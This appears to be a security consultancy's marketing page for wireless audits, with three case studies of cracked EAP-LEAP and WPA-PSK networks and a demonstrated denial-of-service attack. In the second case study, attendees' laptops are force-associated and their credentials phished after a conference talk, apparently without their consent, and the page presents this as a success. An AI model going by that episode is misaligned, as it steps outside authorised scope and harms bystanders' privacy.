Quick Search

Advanced Search

Wireless Audit

>   Wireless Audit: Wireless Audit

Wireless audits are performed by a specialist team present in the coverage zone of wireless networks and devices of a company or organisation. They aim at discovering and eliminating vulnerabilities and misconfigurations that can allow abuse of wireless connectivity to gain unauthorised access to data, systems and networks, or cause serious availability problems. These audits are especially critical for companies and organisations, that

  • employ wireless networks for any business operations
  • actively use mobile/portable computers, including smartphones
  • have a previous history of wireless security incidents
  • are very cautious about information security and want to be sure that unauthorised wireless devices are not present even if no wireless networks are officially deployed
+ Key benefits
  • Identifying threats and risks related to all forms of wireless connectivity within a company or organisation
  • Assessing the separation between wireless and wired network environments
  • Analysing security of all wireless devices that belong to a company or organisation or are positioned within it's premises
  • Discovering misconfigurations and sources of interference that can have negative impact on both wireless network security and quality of service
  • Finding and eliminating undesirable wireless data leaks and privacy disclosures
  • Suggesting appropriate remedies and fixes for all security and quality of service problems discovered
Description

It is vital to understand, that the declared "absence" or even a strict prohibition of wireless networks by the corporate security policy does not make you completely immune to wireless attacks. First of all, modern portable computers and even smartphones support wireless connectivity, and often have it turned on by default without the owner's knowledge. If attackers can successfully exploit it, they would not only gain access to the vulnerable mobile computer and all the information it stores, transmits and receives, but can also use this computer to penetrate into any wired networks it could be connected to. Than, because of the comfort provided by wireless connectivity, employees often install access points at work without any permission or bring their own wireless-enabled laptops and PDA's into offices and connect them to internal networks. As a rule of a thumb, such access points and mobile computers are usually absolutely unprotected. Thus, we always recommend to supplement at least the internal audits with a brief wireless scan to discover unauthorised connectivity sources - even if the company management is fully confident that wireless security is a non-issue. Our experience tells exactly the opposite.

Wireless security audits demand full understanding of all the specific technologies involved. The important knowledge areas range from the foundations of radio physics to wireless-specific encryption protocols and the latest wireless security industry standards and certifications. Having (and knowing how to operate!) all necessary instruments - frequency analysers, RF power meters, antennas, reflectors, amplifiers, special client hardware that supports all needed software tools and so on - is also crucial. Network reconnaissance becomes area reconnaissance: the auditors must determine and outline coverage zones of all active wireless networks and devices discovered, as well as find and characterise all present sources of interference. These sources would inevitably include networks and devices belonging to neighbouring companies, organisations and households. Signal strength, direction and levels of noise are measured, "dead zones" are investigated, various radiophysical issues that can lead to connectivity problems are examined and resolved. The results of wireless reconnaissance, including positions of all discovered unauthorised hosts and radio interference sources, are carefully marked on the applicable maps and plans of investigated buildings and landscapes.

The discovery and analysis of wireless vulnerabilities and misconfigurations are centered on

  • investigating possible information leaks via wireless devices and networks and determining seriousness and the exact sources of these leaks
  • checking whether any unauthorised connectivity to corporate wireless networks is possible
  • evaluating all opportunities of establishing unauthorised links with separate wireless-enabled devices, including those not associated to any networks
  • finding and analysing security flaws in all wireless-enabled devices and appliances
  • checking whether the existing wireless and wired network separation mechanisms can be bypassed
  • analysing efficiency and stability of wireless intrusion detection and prevention systems, if deployed

An overwhelming majority of methods and techniques needed to reach the goals listed above with clear success require understanding and hands-on experience of low level wireless protocols and protection mechanisms. Thus, they can not be applied by wired network security professionals without receiving prior specialised training in wireless networking and security.

Case Studies

  1. "Upgrade Enforcement".
    A large manufacturing plant employed Cisco EAP-LEAP to authenticate its employees to the wireless network covering the factory warehouses, offices and machine rooms. An argument whether the plant's IT department should spend time and effort to upgrade to the novel and more secure Cisco EAP-FAST authentication protocol led to requesting an independent wireless security assessment. During the audit EAP-LEAP authentication credentials of several legitimate users were cracked allowing successful network association and further gateway scans. Using directional antennas, the auditors were also able to connect to the network and perform various security tests far away from the factory, thus avoiding being spotted by security guards and perimeter CCTV systems. Besides, the reconnaissance phase of the assessment uncovered several non-802.11 sources of interference, that severely impaired wireless networks quality of service in selected warehouse storage areas. In these areas, wireless barcode readers were regularly used, and their connectivity problems were previously reported by workers. The interference sources were pinpointed as the elements of a distributed alarm sensor system deployed in the warehouses. Now the plant is using EAP-FAST to authenticate it's users and distribute WPA keys. After the network reconfiguration, all operational frequencies "polluted" by the alarm system sensors are carefully avoided.
  2. "A Phishing Trip".
    One of the largest multinational corporations has asked our consultants to present on wireless client-side vulnerabilities and defence at its annual security conference. The attendees, themselves security or networking consultants and IT managers, were forewarned that the presentation would include live demonstrations of various client-side attacks. Thus, out of caution, they have turned off wireless support of their laptops and PDA's during the demonstrations. As our consultants were escorted out by security guards after the presentation was over, the CSO of the corporation has joined them for an after-talk discussion. The same attacks were repeated in the CSO's presence outside the conference hall. As the attendees started to turn back wireless capabilities of their mobile hosts, multiple laptops were force-associated by the consultants and several login credentials were successfully phished out, while other interesting data was also captured. The CSO has recorded MAC addresses and usernames, that belonged to the owners of the involved laptops.
  3. "Risky Bids".
    A well-known hippodrome employed a system to take real-time bids from gamblers mobile computers connected via wireless links. The management of the hippodrome was concerned about possible bidding fraud and other malicious actions if the system's wireless protection mechanisms are compromised. Thus, they have decided to order a wireless security audit to establish whether unauthorised access is possible and determine the best defence means against any potential wireless threats. The auditors have discovered that the hippodrome wireless networks are safeguarded by WPA PSK (pre-shared key), and successfully cracked one of the keys, thus gaining access to the network it protected. Besides, an opportunity to run massive wireless denial of service (DoS) attacks using broadcast MAC addresses of networks was demonstrated. Such an opportunity could cause significant financial losses if attackers block the very possibility to place bids electronically during a race. The audit report strongly suggested, that using a common shared password for multiple users access is unsafe, since rogue users would be able to snoop on their neighbours bids and modify them at will. In accordance with the auditors recommendations, a transition from WPA PSK to more secure WPA Industry countermeasures was performed. Access points firmware was updated to prevent broadcast-based DoS attacks. After a few months, a distributed wireless intrusion prevention system was deployed to monitor the hippodrome networks and deflect various hacking attempts.
This category is currently has no content associated with it.

Subscribe via RSS